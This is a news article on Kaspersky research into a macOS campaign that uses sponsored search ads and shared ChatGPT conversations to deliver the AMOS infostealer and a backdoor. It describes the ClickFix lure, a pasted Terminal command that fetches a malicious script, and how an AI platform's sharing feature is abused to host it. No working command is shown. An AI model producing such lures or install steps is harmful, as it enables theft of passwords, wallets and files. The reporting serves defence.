Image: Getty Images
Kaspersky Threat Research has uncovered a new malware campaign targeting macOS users, exploiting paid Google search ads and shared conversations on the official ChatGPT website to distribute the AMOS (Atomic macOS Stealer) infostealer along with a persistent backdoor.
According to Kaspersky, attackers are purchasing sponsored search ads linked to queries such as “chatgpt atlas” and redirecting users to what appears to be an installation guide for “ChatGPT Atlas for macOS”. The page is hosted on chatgpt.com and presented as a shared ChatGPT conversation. In reality, the content has been generated through prompt engineering and stripped down to display only step-by-step installation instructions.
The guide instructs users to copy a single line of code, open the Terminal application on macOS, paste the command, and grant all requested permissions. Kaspersky’s analysis shows that executing the command downloads and runs a malicious script from an external domain, atlas-extension[.]com.
The script repeatedly prompts users for their system password, validating it by attempting to execute system-level commands. Once the correct password is entered, the malware proceeds to download and install the AMOS infostealer using the stolen credentials, before launching it on the device. The infection method is a variation of the “ClickFix” technique, which relies on persuading users to manually execute shell commands that retrieve malicious code from remote servers.
Once installed, AMOS harvests sensitive data that can be monetised or reused in subsequent attacks. This includes passwords and cookies from popular web browsers, data from cryptocurrency wallets such as Electrum, Coinomi and Exodus, and information from applications including Telegram Desktop and OpenVPN Connect. The malware also scans for TXT, PDF and DOCX files stored in Desktop, Documents and Downloads folders, as well as notes saved in the macOS Notes app, exfiltrating the data to attacker-controlled infrastructure.
A backdoor
In parallel, the campaign deploys a backdoor that is configured to persist across system reboots, providing attackers with remote access to compromised devices and duplicating much of AMOS’s data-collection functionality.
Kaspersky said the campaign highlights a broader trend in which infostealers have emerged as one of the fastest-growing cyber threats in 2025. Attackers are increasingly leveraging AI-related themes, fake AI tools and AI-generated content to enhance the credibility of their lures. The Atlas-themed activity extends this trend by abusing a legitimate AI platform’s content-sharing features.
Read: Inside Kaspersky’s plan to build cyber immune systems for the GCC
“What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” said Vladimir Gursky, malware analyst at Kaspersky. “A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command. For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”
Kaspersky advised users to exercise caution when encountering unsolicited guides that require running Terminal or PowerShell commands, particularly those involving one-line scripts copied from websites, documents or chat messages. The company also recommended verifying suspicious commands using security tools, avoiding unclear instructions, and ensuring reputable security software is installed and kept up to date on macOS systems.
